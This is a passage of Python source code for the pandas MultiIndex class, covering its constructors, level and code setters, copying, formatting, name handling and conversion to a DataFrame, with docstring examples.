codes : optional list
Codes to check for validity. Defaults to current codes.
levels : optional list
Levels to check for validity. Defaults to current levels.
Raises
------
ValueError
If length of levels and codes don't match, if the codes for any
level would exceed level bounds, or there are any duplicate levels.
Returns
-------
new codes where code value = -1 if it corresponds to a
NaN level.
"""
# NOTE: Currently does not check, among other things, that cached
# nlevels matches nor that sortorder matches actually sortorder.
codes = codes or self.codes
levels = levels or self.levels
if len(levels) != len(codes):
raise ValueError(
"Length of levels and codes must match. NOTE: "
"this index is in an inconsistent state."
)
codes_length = len(codes[0])
for i, (level, level_codes) in enumerate(zip(levels, codes)):
if len(level_codes) != codes_length:
raise ValueError(
f"Unequal code lengths: {[len(code_) for code_ in codes]}"
)
if len(level_codes) and level_codes.max() >= len(level):
raise ValueError(
f"On level {i}, code max ({level_codes.max()}) >= length of "
f"level ({len(level)}). NOTE: this index is in an "
"inconsistent state"
)
if len(level_codes) and level_codes.min() < -1:
raise ValueError(f"On level {i}, code value ({level_codes.min()}) < -1")
if not level.is_unique:
raise ValueError(
f"Level values must be unique: {list(level)} on level {i}"
)
if self.sortorder is not None:
if self.sortorder > _lexsort_depth(self.codes, self.nlevels):
raise ValueError(
"Value for sortorder must be inferior or equal to actual "
f"lexsort_depth: sortorder {self.sortorder} "
f"with lexsort_depth {_lexsort_depth(self.codes, self.nlevels)}"
)
codes = [
self._validate_codes(level, code) for level, code in zip(levels, codes)
]
new_codes = FrozenList(codes)
return new_codes
@classmethod
def from_arrays(cls, arrays, sortorder=None, names=lib.no_default) -> MultiIndex:
"""
Convert arrays to MultiIndex.
Parameters
----------
arrays : list / sequence of array-likes
Each array-like gives one level's value for each data point.
len(arrays) is the number of levels.
sortorder : int or None
Level of sortedness (must be lexicographically sorted by that
level).
names : list / sequence of str, optional
Names for the levels in the index.
Returns
-------
MultiIndex
See Also
--------
MultiIndex.from_tuples : Convert list of tuples to MultiIndex.
MultiIndex.from_product : Make a MultiIndex from cartesian product
of iterables.
MultiIndex.from_frame : Make a MultiIndex from a DataFrame.
Examples
--------
>>> arrays = [[1, 1, 2, 2], ['red', 'blue', 'red', 'blue']]
>>> pd.MultiIndex.from_arrays(arrays, names=('number', 'color'))
MultiIndex([(1, 'red'),
(1, 'blue'),
(2, 'red'),
(2, 'blue')],
names=['number', 'color'])
"""
error_msg = "Input must be a list / sequence of array-likes."
if not is_list_like(arrays):
raise TypeError(error_msg)
elif is_iterator(arrays):
arrays = list(arrays)
# Check if elements of array are list-like
for array in arrays:
if not is_list_like(array):
raise TypeError(error_msg)
# Check if lengths of all arrays are equal or not,
# raise ValueError, if not
for i in range(1, len(arrays)):
if len(arrays[i]) != len(arrays[i - 1]):
raise ValueError("all arrays must be same length")
codes, levels = factorize_from_iterables(arrays)
if names is lib.no_default:
names = [getattr(arr, "name", None) for arr in arrays]
return cls(
levels=levels,
codes=codes,
sortorder=sortorder,
names=names,
verify_integrity=False,
)
@classmethod
@names_compat
def from_tuples(
cls,
tuples: Iterable[tuple[Hashable, ...]],
sortorder: int | None = None,
names: Sequence[Hashable] | None = None,
) -> MultiIndex:
"""
Convert list of tuples to MultiIndex.
Parameters
----------
tuples : list / sequence of tuple-likes
Each tuple is the index of one row/column.
sortorder : int or None
Level of sortedness (must be lexicographically sorted by that
level).
names : list / sequence of str, optional
Names for the levels in the index.
Returns
-------
MultiIndex
See Also
--------
MultiIndex.from_arrays : Convert list of arrays to MultiIndex.
MultiIndex.from_product : Make a MultiIndex from cartesian product
of iterables.
MultiIndex.from_frame : Make a MultiIndex from a DataFrame.
Examples
--------
>>> tuples = [(1, 'red'), (1, 'blue'),
... (2, 'red'), (2, 'blue')]
>>> pd.MultiIndex.from_tuples(tuples, names=('number', 'color'))
MultiIndex([(1, 'red'),
(1, 'blue'),
(2, 'red'),
(2, 'blue')],
names=['number', 'color'])
"""
if not is_list_like(tuples):
raise TypeError("Input must be a list / sequence of tuple-likes.")
elif is_iterator(tuples):
tuples = list(tuples)
tuples = cast(Collection[Tuple[Hashable, ...]], tuples)
arrays: list[Sequence[Hashable]]
if len(tuples) == 0:
if names is None:
raise TypeError("Cannot infer number of levels from empty list")
arrays = [[]] * len(names)
elif isinstance(tuples, (np.ndarray, Index)):
if isinstance(tuples, Index):
tuples = np.asarray(tuples._values)
arrays = list(lib.tuples_to_object_array(tuples).T)
elif isinstance(tuples, list):
arrays = list(lib.to_object_array_tuples(tuples).T)
else:
arrs = zip(*tuples)
arrays = cast(List[Sequence[Hashable]], arrs)
return cls.from_arrays(arrays, sortorder=sortorder, names=names)
@classmethod
def from_product(
cls, iterables, sortorder=None, names=lib.no_default
) -> MultiIndex:
"""
Make a MultiIndex from the cartesian product of multiple iterables.
Parameters
----------
iterables : list / sequence of iterables
Each iterable has unique labels for each level of the index.
sortorder : int or None
Level of sortedness (must be lexicographically sorted by that
level).
names : list / sequence of str, optional
Names for the levels in the index.
.. versionchanged:: 1.0.0
If not explicitly provided, names will be inferred from the
elements of iterables if an element has a name attribute
Returns
-------
MultiIndex
See Also
--------
MultiIndex.from_arrays : Convert list of arrays to MultiIndex.
MultiIndex.from_tuples : Convert list of tuples to MultiIndex.
MultiIndex.from_frame : Make a MultiIndex from a DataFrame.
Examples
--------
>>> numbers = [0, 1, 2]
>>> colors = ['green', 'purple']
>>> pd.MultiIndex.from_product([numbers, colors],
... names=['number', 'color'])
MultiIndex([(0, 'green'),
(0, 'purple'),
(1, 'green'),
(1, 'purple'),
(2, 'green'),
(2, 'purple')],
names=['number', 'color'])
"""
from pandas.core.reshape.util import cartesian_product
if not is_list_like(iterables):
raise TypeError("Input must be a list / sequence of iterables.")
elif is_iterator(iterables):
iterables = list(iterables)
codes, levels = factorize_from_iterables(iterables)
if names is lib.no_default:
names = [getattr(it, "name", None) for it in iterables]
# codes are all ndarrays, so cartesian_product is lossless
codes = cartesian_product(codes)
return cls(levels, codes, sortorder=sortorder, names=names)
@classmethod
def from_frame(cls, df: DataFrame, sortorder=None, names=None) -> MultiIndex:
"""
Make a MultiIndex from a DataFrame.
Parameters
----------
df : DataFrame
DataFrame to be converted to MultiIndex.
sortorder : int, optional
Level of sortedness (must be lexicographically sorted by that
level).
names : list-like, optional
If no names are provided, use the column names, or tuple of column
names if the columns is a MultiIndex. If a sequence, overwrite
names with the given sequence.
Returns
-------
MultiIndex
The MultiIndex representation of the given DataFrame.
See Also
--------
MultiIndex.from_arrays : Convert list of arrays to MultiIndex.
MultiIndex.from_tuples : Convert list of tuples to MultiIndex.
MultiIndex.from_product : Make a MultiIndex from cartesian product
of iterables.
Examples
--------
>>> df = pd.DataFrame([['HI', 'Temp'], ['HI', 'Precip'],
... ['NJ', 'Temp'], ['NJ', 'Precip']],
... columns=['a', 'b'])
>>> df
a b
0 HI Temp
1 HI Precip
2 NJ Temp
3 NJ Precip
>>> pd.MultiIndex.from_frame(df)
MultiIndex([('HI', 'Temp'),
('HI', 'Precip'),
('NJ', 'Temp'),
('NJ', 'Precip')],
names=['a', 'b'])
Using explicit names, instead of the column names
>>> pd.MultiIndex.from_frame(df, names=['state', 'observation'])
MultiIndex([('HI', 'Temp'),
('HI', 'Precip'),
('NJ', 'Temp'),
('NJ', 'Precip')],
names=['state', 'observation'])
"""
if not isinstance(df, ABCDataFrame):
raise TypeError("Input must be a DataFrame")
column_names, columns = zip(*df.items())
names = column_names if names is None else names
return cls.from_arrays(columns, sortorder=sortorder, names=names)
# --------------------------------------------------------------------
@cache_readonly
def _values(self) -> np.ndarray:
# We override here, since our parent uses _data, which we don't use.
values = []
for i in range(self.nlevels):
vals = self._get_level_values(i)
if is_categorical_dtype(vals.dtype):
vals = cast("CategoricalIndex", vals)
vals = vals._data._internal_get_values()
if isinstance(vals.dtype, ExtensionDtype) or isinstance(
vals, (ABCDatetimeIndex, ABCTimedeltaIndex)
):
vals = vals.astype(object)
# error: Incompatible types in assignment (expression has type "ndarray",
# variable has type "Index")
vals = np.array(vals, copy=False) # type: ignore[assignment]
values.append(vals)
arr = lib.fast_zip(values)
return arr
@property
def values(self) -> np.ndarray:
return self._values
@property
def array(self):
"""
Raises a ValueError for `MultiIndex` because there's no single
array backing a MultiIndex.
Raises
------
ValueError
"""
raise ValueError(
"MultiIndex has no single backing array. Use "
"'MultiIndex.to_numpy()' to get a NumPy array of tuples."
)
@cache_readonly
def dtypes(self) -> Series:
"""
Return the dtypes as a Series for the underlying MultiIndex
"""
from pandas import Series
return Series(
{
f"level_{idx}" if level.name is None else level.name: level.dtype
for idx, level in enumerate(self.levels)
}
)
def __len__(self) -> int:
return len(self.codes[0])
# --------------------------------------------------------------------
# Levels Methods
@cache_readonly
def levels(self) -> FrozenList:
# Use cache_readonly to ensure that self.get_locs doesn't repeatedly
# create new IndexEngine
# https://github.com/pandas-dev/pandas/issues/31648
result = [x._rename(name=name) for x, name in zip(self._levels, self._names)]
for level in result:
# disallow midx.levels[0].name = "foo"
level._no_setting_name = True
return FrozenList(result)
def _set_levels(
self,
levels,
*,
level=None,
copy: bool = False,
validate: bool = True,
verify_integrity: bool = False,
) -> None:
# This is NOT part of the levels property because it should be
# externally not allowed to set levels. User beware if you change
# _levels directly
if validate:
if len(levels) == 0:
raise ValueError("Must set non-zero number of levels.")
if level is None and len(levels) != self.nlevels:
raise ValueError("Length of levels must match number of levels.")
if level is not None and len(levels) != len(level):
raise ValueError("Length of levels must match length of level.")
if level is None:
new_levels = FrozenList(
ensure_index(lev, copy=copy)._view() for lev in levels
)
else:
level_numbers = [self._get_level_number(lev) for lev in level]
new_levels_list = list(self._levels)
for lev_num, lev in zip(level_numbers, levels):
new_levels_list[lev_num] = ensure_index(lev, copy=copy)._view()
new_levels = FrozenList(new_levels_list)
if verify_integrity:
new_codes = self._verify_integrity(levels=new_levels)
self._codes = new_codes
names = self.names
self._levels = new_levels
if any(names):
self._set_names(names)
self._reset_cache()
@deprecate_nonkeyword_arguments(version=None, allowed_args=["self", "levels"])
def set_levels(
self, levels, level=None, inplace=None, verify_integrity: bool = True
):
"""
Set new levels on MultiIndex. Defaults to returning new index.
Parameters
----------
levels : sequence or list of sequence
New level(s) to apply.
level : int, level name, or sequence of int/level names (default None)
Level(s) to set (None for all levels).
inplace : bool
If True, mutates in place.
.. deprecated:: 1.2.0
verify_integrity : bool, default True
If True, checks that levels and codes are compatible.
Returns
-------
new index (of same type and class...etc) or None
The same type as the caller or None if ``inplace=True``.
Examples
--------
>>> idx = pd.MultiIndex.from_tuples(
... [
... (1, "one"),
... (1, "two"),
... (2, "one"),
... (2, "two"),
... (3, "one"),
... (3, "two")
... ],
... names=["foo", "bar"]
... )
>>> idx
MultiIndex([(1, 'one'),
(1, 'two'),
(2, 'one'),
(2, 'two'),
(3, 'one'),
(3, 'two')],
names=['foo', 'bar'])
>>> idx.set_levels([['a', 'b', 'c'], [1, 2]])
MultiIndex([('a', 1),
('a', 2),
('b', 1),
('b', 2),
('c', 1),
('c', 2)],
names=['foo', 'bar'])
>>> idx.set_levels(['a', 'b', 'c'], level=0)
MultiIndex([('a', 'one'),
('a', 'two'),
('b', 'one'),
('b', 'two'),
('c', 'one'),
('c', 'two')],
names=['foo', 'bar'])
>>> idx.set_levels(['a', 'b'], level='bar')
MultiIndex([(1, 'a'),
(1, 'b'),
(2, 'a'),
(2, 'b'),
(3, 'a'),
(3, 'b')],
names=['foo', 'bar'])
If any of the levels passed to ``set_levels()`` exceeds the
existing length, all of the values from that argument will
be stored in the MultiIndex levels, though the values will
be truncated in the MultiIndex output.
>>> idx.set_levels([['a', 'b', 'c'], [1, 2, 3, 4]], level=[0, 1])
MultiIndex([('a', 1),
('a', 2),
('b', 1),
('b', 2),
('c', 1),
('c', 2)],
names=['foo', 'bar'])
>>> idx.set_levels([['a', 'b', 'c'], [1, 2, 3, 4]], level=[0, 1]).levels
FrozenList([['a', 'b', 'c'], [1, 2, 3, 4]])
"""
if inplace is not None:
warnings.warn(
"inplace is deprecated and will be removed in a future version.",
FutureWarning,
stacklevel=3,
)
else:
inplace = False
if is_list_like(levels) and not isinstance(levels, Index):
levels = list(levels)
level, levels = _require_listlike(level, levels, "Levels")
if inplace:
idx = self
else:
idx = self._view()
idx._reset_identity()
idx._set_levels(
levels, level=level, validate=True, verify_integrity=verify_integrity
)
if not inplace:
return idx
@property
def nlevels(self) -> int:
"""
Integer number of levels in this MultiIndex.
Examples
--------
>>> mi = pd.MultiIndex.from_arrays([['a'], ['b'], ['c']])
>>> mi
MultiIndex([('a', 'b', 'c')],
)
>>> mi.nlevels
3
"""
return len(self._levels)
@property
def levshape(self) -> Shape:
"""
A tuple with the length of each level.
Examples
--------
>>> mi = pd.MultiIndex.from_arrays([['a'], ['b'], ['c']])
>>> mi
MultiIndex([('a', 'b', 'c')],
)
>>> mi.levshape
(1, 1, 1)
"""
return tuple(len(x) for x in self.levels)
# --------------------------------------------------------------------
# Codes Methods
@property
def codes(self):
return self._codes
def _set_codes(
self,
codes,
*,
level=None,
copy: bool = False,
validate: bool = True,
verify_integrity: bool = False,
) -> None:
if validate:
if level is None and len(codes) != self.nlevels:
raise ValueError("Length of codes must match number of levels")
if level is not None and len(codes) != len(level):
raise ValueError("Length of codes must match length of levels.")
if level is None:
new_codes = FrozenList(
_coerce_indexer_frozen(level_codes, lev, copy=copy).view()
for lev, level_codes in zip(self._levels, codes)
)
else:
level_numbers = [self._get_level_number(lev) for lev in level]
new_codes_list = list(self._codes)
for lev_num, level_codes in zip(level_numbers, codes):
lev = self.levels[lev_num]
new_codes_list[lev_num] = _coerce_indexer_frozen(
level_codes, lev, copy=copy
)
new_codes = FrozenList(new_codes_list)
if verify_integrity:
new_codes = self._verify_integrity(codes=new_codes)
self._codes = new_codes
self._reset_cache()
@deprecate_nonkeyword_arguments(version=None, allowed_args=["self", "codes"])
def set_codes(self, codes, level=None, inplace=None, verify_integrity: bool = True):
"""
Set new codes on MultiIndex. Defaults to returning new index.
Parameters
----------
codes : sequence or list of sequence
New codes to apply.
level : int, level name, or sequence of int/level names (default None)
Level(s) to set (None for all levels).
inplace : bool
If True, mutates in place.
.. deprecated:: 1.2.0
verify_integrity : bool, default True
If True, checks that levels and codes are compatible.
Returns
-------
new index (of same type and class...etc) or None
The same type as the caller or None if ``inplace=True``.
Examples
--------
>>> idx = pd.MultiIndex.from_tuples(
... [(1, "one"), (1, "two"), (2, "one"), (2, "two")], names=["foo", "bar"]
... )
>>> idx
MultiIndex([(1, 'one'),
(1, 'two'),
(2, 'one'),
(2, 'two')],
names=['foo', 'bar'])
>>> idx.set_codes([[1, 0, 1, 0], [0, 0, 1, 1]])
MultiIndex([(2, 'one'),
(1, 'one'),
(2, 'two'),
(1, 'two')],
names=['foo', 'bar'])
>>> idx.set_codes([1, 0, 1, 0], level=0)
MultiIndex([(2, 'one'),
(1, 'two'),
(2, 'one'),
(1, 'two')],
names=['foo', 'bar'])
>>> idx.set_codes([0, 0, 1, 1], level='bar')
MultiIndex([(1, 'one'),
(1, 'one'),
(2, 'two'),
(2, 'two')],
names=['foo', 'bar'])
>>> idx.set_codes([[1, 0, 1, 0], [0, 0, 1, 1]], level=[0, 1])
MultiIndex([(2, 'one'),
(1, 'one'),
(2, 'two'),
(1, 'two')],
names=['foo', 'bar'])
"""
if inplace is not None:
warnings.warn(
"inplace is deprecated and will be removed in a future version.",
FutureWarning,
stacklevel=3,
)
else:
inplace = False
level, codes = _require_listlike(level, codes, "Codes")
if inplace:
idx = self
else:
idx = self._view()
idx._reset_identity()
idx._set_codes(codes, level=level, verify_integrity=verify_integrity)
if not inplace:
return idx
# --------------------------------------------------------------------
# Index Internals
@cache_readonly
def _engine(self):
# Calculate the number of bits needed to represent labels in each
# level, as log2 of their sizes (including -1 for NaN):
sizes = np.ceil(np.log2([len(level) + 1 for level in self.levels]))
# Sum bit counts, starting from the _right_....
lev_bits = np.cumsum(sizes[::-1])[::-1]
# ... in order to obtain offsets such that sorting the combination of
# shifted codes (one for each level, resulting in a unique integer) is
# equivalent to sorting lexicographically the codes themselves. Notice
# that each level needs to be shifted by the number of bits needed to
# represent the _previous_ ones:
offsets = np.concatenate([lev_bits[1:], [0]]).astype("uint64")
# Check the total number of bits needed for our representation:
if lev_bits[0] > 64:
# The levels would overflow a 64 bit uint - use Python integers:
return MultiIndexPyIntEngine(self.levels, self.codes, offsets)
return MultiIndexUIntEngine(self.levels, self.codes, offsets)
@property
def _constructor(self) -> Callable[..., MultiIndex]:
return type(self).from_tuples
@doc(Index._shallow_copy)
def _shallow_copy(self, values: np.ndarray, name=lib.no_default) -> MultiIndex:
names = name if name is not lib.no_default else self.names
return type(self).from_tuples(values, sortorder=None, names=names)
def _view(self) -> MultiIndex:
result = type(self)(
levels=self.levels,
codes=self.codes,
sortorder=self.sortorder,
names=self.names,
verify_integrity=False,
)
result._cache = self._cache.copy()
result._cache.pop("levels", None) # GH32669
return result
# --------------------------------------------------------------------
def copy(
self,
names=None,
dtype=None,
levels=None,
codes=None,
deep=False,
name=None,
):
"""
Make a copy of this object. Names, dtype, levels and codes can be
passed and will be set on new copy.
Parameters
----------
names : sequence, optional
dtype : numpy dtype or pandas type, optional
.. deprecated:: 1.2.0
levels : sequence, optional
.. deprecated:: 1.2.0
codes : sequence, optional
.. deprecated:: 1.2.0
deep : bool, default False
name : Label
Kept for compatibility with 1-dimensional Index. Should not be used.
Returns
-------
MultiIndex
Notes
-----
In most cases, there should be no functional difference from using
``deep``, but if ``deep`` is passed it will attempt to deepcopy.
This could be potentially expensive on large MultiIndex objects.
"""
names = self._validate_names(name=name, names=names, deep=deep)
if levels is not None:
warnings.warn(
"parameter levels is deprecated and will be removed in a future "
"version. Use the set_levels method instead.",
FutureWarning,
stacklevel=2,
)
if codes is not None:
warnings.warn(
"parameter codes is deprecated and will be removed in a future "
"version. Use the set_codes method instead.",
FutureWarning,
stacklevel=2,
)
if deep:
from copy import deepcopy
if levels is None:
levels = deepcopy(self.levels)
if codes is None:
codes = deepcopy(self.codes)
levels = levels if levels is not None else self.levels
codes = codes if codes is not None else self.codes
new_index = type(self)(
levels=levels,
codes=codes,
sortorder=self.sortorder,
names=names,
verify_integrity=False,
)
new_index._cache = self._cache.copy()
new_index._cache.pop("levels", None) # GH32669
if dtype:
warnings.warn(
"parameter dtype is deprecated and will be removed in a future "
"version. Use the astype method instead.",
FutureWarning,
stacklevel=2,
)
new_index = new_index.astype(dtype)
return new_index
def __array__(self, dtype=None) -> np.ndarray:
"""the array interface, return my values"""
return self.values
def view(self, cls=None):
"""this is defined as a copy with the same identity"""
result = self.copy()
result._id = self._id
return result
@doc(Index.__contains__)
def __contains__(self, key: Any) -> bool:
hash(key)
try:
self.get_loc(key)
return True
except (LookupError, TypeError, ValueError):
return False
@cache_readonly
def dtype(self) -> np.dtype:
return np.dtype("O")
def _is_memory_usage_qualified(self) -> bool:
"""return a boolean if we need a qualified .info display"""
def f(level):
return "mixed" in level or "string" in level or "unicode" in level
return any(f(level) for level in self._inferred_type_levels)
@doc(Index.memory_usage)
def memory_usage(self, deep: bool = False) -> int:
# we are overwriting our base class to avoid
# computing .values here which could materialize
# a tuple representation unnecessarily
return self._nbytes(deep)
@cache_readonly
def nbytes(self) -> int:
"""return the number of bytes in the underlying data"""
return self._nbytes(False)
def _nbytes(self, deep: bool = False) -> int:
"""
return the number of bytes in the underlying data
deeply introspect the level data if deep=True
include the engine hashtable
*this is in internal routine*
"""
# for implementations with no useful getsizeof (PyPy)
objsize = 24
level_nbytes = sum(i.memory_usage(deep=deep) for i in self.levels)
label_nbytes = sum(i.nbytes for i in self.codes)
names_nbytes = sum(getsizeof(i, objsize) for i in self.names)
result = level_nbytes + label_nbytes + names_nbytes
# include our engine hashtable
result += self._engine.sizeof(deep=deep)
return result
# --------------------------------------------------------------------
# Rendering Methods
def _formatter_func(self, tup):
"""
Formats each item in tup according to its level's formatter function.
"""
formatter_funcs = [level._formatter_func for level in self.levels]
return tuple(func(val) for func, val in zip(formatter_funcs, tup))
def _format_native_types(self, na_rep="nan", **kwargs):
new_levels = []
new_codes = []
# go through the levels and format them
for level, level_codes in zip(self.levels, self.codes):
level_strs = level._format_native_types(na_rep=na_rep, **kwargs)
# add nan values, if there are any
mask = level_codes == -1
if mask.any():
nan_index = len(level_strs)
# numpy 1.21 deprecated implicit string casting
level_strs = level_strs.astype(str)
level_strs = np.append(level_strs, na_rep)
assert not level_codes.flags.writeable # i.e. copy is needed
level_codes = level_codes.copy() # make writeable
level_codes[mask] = nan_index
new_levels.append(level_strs)
new_codes.append(level_codes)
if len(new_levels) == 1:
# a single-level multi-index
return Index(new_levels[0].take(new_codes[0]))._format_native_types()
else:
# reconstruct the multi-index
mi = MultiIndex(
levels=new_levels,
codes=new_codes,
names=self.names,
sortorder=self.sortorder,
verify_integrity=False,
)
return mi._values
def format(
self,
name: bool | None = None,
formatter: Callable | None = None,
na_rep: str | None = None,
names: bool = False,
space: int = 2,
sparsify=None,
adjoin: bool = True,
) -> list:
if name is not None:
names = name
if len(self) == 0:
return []
stringified_levels = []
for lev, level_codes in zip(self.levels, self.codes):
na = na_rep if na_rep is not None else _get_na_rep(lev.dtype.type)
if len(lev) > 0:
formatted = lev.take(level_codes).format(formatter=formatter)
# we have some NA
mask = level_codes == -1
if mask.any():
formatted = np.array(formatted, dtype=object)
formatted[mask] = na
formatted = formatted.tolist()
else:
# weird all NA case
formatted = [
pprint_thing(na if isna(x) else x, escape_chars=("\t", "\r", "\n"))
for x in algos.take_nd(lev._values, level_codes)
]
stringified_levels.append(formatted)
result_levels = []
for lev, lev_name in zip(stringified_levels, self.names):
level = []
if names:
level.append(
pprint_thing(lev_name, escape_chars=("\t", "\r", "\n"))
if lev_name is not None
else ""
)
level.extend(np.array(lev, dtype=object))
result_levels.append(level)
if sparsify is None:
sparsify = get_option("display.multi_sparse")
if sparsify:
sentinel = ""
# GH3547 use value of sparsify as sentinel if it's "Falsey"
assert isinstance(sparsify, bool) or sparsify is lib.no_default
if sparsify in [False, lib.no_default]:
sentinel = sparsify
# little bit of a kludge job for #1217
result_levels = sparsify_labels(
result_levels, start=int(names), sentinel=sentinel
)
if adjoin:
from pandas.io.formats.format import get_adjustment
adj = get_adjustment()
return adj.adjoin(space, *result_levels).split("\n")
else:
return result_levels
# --------------------------------------------------------------------
# Names Methods
def _get_names(self) -> FrozenList:
return FrozenList(self._names)
def _set_names(self, names, *, level=None, validate: bool = True):
"""
Set new names on index. Each name has to be a hashable type.
Parameters
----------
values : str or sequence
name(s) to set
level : int, level name, or sequence of int/level names (default None)
If the index is a MultiIndex (hierarchical), level(s) to set (None
for all levels). Otherwise level must be None
validate : bool, default True
validate that the names match level lengths
Raises
------
TypeError if each name is not hashable.
Notes
-----
sets names on levels. WARNING: mutates!
Note that you generally want to set this *after* changing levels, so
that it only acts on copies
"""
# GH 15110
# Don't allow a single string for names in a MultiIndex
if names is not None and not is_list_like(names):
raise ValueError("Names should be list-like for a MultiIndex")
names = list(names)
if validate:
if level is not None and len(names) != len(level):
raise ValueError("Length of names must match length of level.")
if level is None and len(names) != self.nlevels:
raise ValueError(
"Length of names must match number of levels in MultiIndex."
)
if level is None:
level = range(self.nlevels)
else:
level = [self._get_level_number(lev) for lev in level]
# set the name
for lev, name in zip(level, names):
if name is not None:
# GH 20527
# All items in 'names' need to be hashable:
if not is_hashable(name):
raise TypeError(
f"{type(self).__name__}.name must be a hashable type"
)
# error: Cannot determine type of '__setitem__'
self._names[lev] = name # type: ignore[has-type]
# If .levels has been accessed, the names in our cache will be stale.
self._reset_cache()
names = property(
fset=_set_names,
fget=_get_names,
doc="""
Names of levels in MultiIndex.
Examples
--------
>>> mi = pd.MultiIndex.from_arrays(
... [[1, 2], [3, 4], [5, 6]], names=['x', 'y', 'z'])
>>> mi
MultiIndex([(1, 3, 5),
(2, 4, 6)],
names=['x', 'y', 'z'])
>>> mi.names
FrozenList(['x', 'y', 'z'])
""",
)
# --------------------------------------------------------------------
@doc(Index._get_grouper_for_level)
def _get_grouper_for_level(self, mapper, *, level):
indexer = self.codes[level]
level_index = self.levels[level]
if mapper is not None:
# Handle group mapping function and return
level_values = self.levels[level].take(indexer)
grouper = level_values.map(mapper)
return grouper, None, None
codes, uniques = algos.factorize(indexer, sort=True)
if len(uniques) > 0 and uniques[0] == -1:
# Handle NAs
mask = indexer != -1
ok_codes, uniques = algos.factorize(indexer[mask], sort=True)
codes = np.empty(len(indexer), dtype=indexer.dtype)
codes[mask] = ok_codes
codes[~mask] = -1
if len(uniques) < len(level_index):
# Remove unobserved levels from level_index
level_index = level_index.take(uniques)
else:
# break references back to us so that setting the name
# on the output of a groupby doesn't reflect back here.
level_index = level_index.copy()
if level_index._can_hold_na:
grouper = level_index.take(codes, fill_value=True)
else:
grouper = level_index.take(codes)
return grouper, codes, level_index
@cache_readonly
def inferred_type(self) -> str:
return "mixed"
def _get_level_number(self, level) -> int:
count = self.names.count(level)
if (count > 1) and not is_integer(level):
raise ValueError(
f"The name {level} occurs multiple times, use a level number"
)
try:
level = self.names.index(level)
except ValueError as err:
if not is_integer(level):
raise KeyError(f"Level {level} not found") from err
elif level < 0:
level += self.nlevels
if level < 0:
orig_level = level - self.nlevels
raise IndexError(
f"Too many levels: Index has only {self.nlevels} levels, "
f"{orig_level} is not a valid level number"
) from err
# Note: levels are zero-based
elif level >= self.nlevels:
raise IndexError(
f"Too many levels: Index has only {self.nlevels} levels, "
f"not {level + 1}"
) from err
return level
@property
def _has_complex_internals(self) -> bool:
# used to avoid libreduction code paths, which raise or require conversion
return True
@cache_readonly
def is_monotonic_increasing(self) -> bool:
"""
return if the index is monotonic increasing (only equal or
increasing) values.
"""
if any(-1 in code for code in self.codes):
return False
if all(level.is_monotonic for level in self.levels):
# If each level is sorted, we can operate on the codes directly. GH27495
return libalgos.is_lexsorted(
[x.astype("int64", copy=False) for x in self.codes]
)
# reversed() because lexsort() wants the most significant key last.
values = [
self._get_level_values(i)._values for i in reversed(range(len(self.levels)))
]
try:
sort_order = np.lexsort(values)
return Index(sort_order).is_monotonic
except TypeError:
# we have mixed types and np.lexsort is not happy
return Index(self._values).is_monotonic
@cache_readonly
def is_monotonic_decreasing(self) -> bool:
"""
return if the index is monotonic decreasing (only equal or
decreasing) values.
"""
# monotonic decreasing if and only if reverse is monotonic increasing
return self[::-1].is_monotonic_increasing
@cache_readonly
def _inferred_type_levels(self) -> list[str]:
"""return a list of the inferred types, one for each level"""
return [i.inferred_type for i in self.levels]
@doc(Index.duplicated)
def duplicated(self, keep="first") -> npt.NDArray[np.bool_]:
shape = tuple(len(lev) for lev in self.levels)
ids = get_group_index(self.codes, shape, sort=False, xnull=False)
return duplicated(ids, keep)
# error: Cannot override final attribute "_duplicated"
# (previously declared in base class "IndexOpsMixin")
_duplicated = duplicated # type: ignore[misc]
def fillna(self, value=None, downcast=None):
"""
fillna is not implemented for MultiIndex
"""
raise NotImplementedError("isna is not defined for MultiIndex")
@doc(Index.dropna)
def dropna(self, how: str = "any") -> MultiIndex:
nans = [level_codes == -1 for level_codes in self.codes]
if how == "any":
indexer = np.any(nans, axis=0)
elif how == "all":
indexer = np.all(nans, axis=0)
else:
raise ValueError(f"invalid how option: {how}")
new_codes = [level_codes[~indexer] for level_codes in self.codes]
return self.set_codes(codes=new_codes)
def _get_level_values(self, level: int, unique: bool = False) -> Index:
"""
Return vector of label values for requested level,
equal to the length of the index
**this is an internal method**
Parameters
----------
level : int
unique : bool, default False
if True, drop duplicated values
Returns
-------
Index
"""
lev = self.levels[level]
level_codes = self.codes[level]
name = self._names[level]
if unique:
level_codes = algos.unique(level_codes)
filled = algos.take_nd(lev._values, level_codes, fill_value=lev._na_value)
return lev._shallow_copy(filled, name=name)
def get_level_values(self, level):
"""
Return vector of label values for requested level.
Length of returned vector is equal to the length of the index.
Parameters
----------
level : int or str
``level`` is either the integer position of the level in the
MultiIndex, or the name of the level.
Returns
-------
values : Index
Values is a level of this MultiIndex converted to
a single :class:`Index` (or subclass thereof).
Examples
--------
Create a MultiIndex:
>>> mi = pd.MultiIndex.from_arrays((list('abc'), list('def')))
>>> mi.names = ['level_1', 'level_2']
Get level values by supplying level as either integer or name:
>>> mi.get_level_values(0)
Index(['a', 'b', 'c'], dtype='object', name='level_1')
>>> mi.get_level_values('level_2')
Index(['d', 'e', 'f'], dtype='object', name='level_2')
"""
level = self._get_level_number(level)
values = self._get_level_values(level)
return values
@doc(Index.unique)
def unique(self, level=None):
if level is None:
return super().unique()
else:
level = self._get_level_number(level)
return self._get_level_values(level=level, unique=True)
def to_frame(self, index: bool = True, name=None) -> DataFrame:
"""
Create a DataFrame with the levels of the MultiIndex as columns.
Column ordering is determined by the DataFrame constructor with data as
a dict.
Parameters
----------
index : bool, default True
Set the index of the returned DataFrame as the original MultiIndex.
name : list / sequence of str, optional
The passed names should substitute index level names.
Returns
-------
DataFrame : a DataFrame containing the original MultiIndex data.
See Also
--------
DataFrame : Two-dimensional, size-mutable, potentially heterogeneous
tabular data.
Examples
--------
>>> mi = pd.MultiIndex.from_arrays([['a', 'b'], ['c', 'd']])
>>> mi
MultiIndex([('a', 'c'),
('b', 'd')],
)
>>> df = mi.to_frame()
>>> df
0 1
a c a c
b d b d
>>> df = mi.to_frame(index=False)
>>> df
0 1
0 a c
1 b d
>>> df = mi.to_frame(name=['x', 'y'])
>>> df
x y
a c a c
b d b d
"""
from pandas import DataFrame
if name is not None:
if not is_list_like(name):
raise TypeError("'name' must be a list / sequence of column names.")
if len(name) != len(self.levels):
raise ValueError(
"'name' should have same length as number of levels on index."
)
idx_names = name
else:
idx_names = self.names
# Guarantee resulting column order - PY36+ dict maintains insertion order
result = DataFrame(
{
(level if lvlname is None else lvlname): self._get_level_values(level)
for lvlname, level in zip(idx_names, range(len(self.levels)))
},
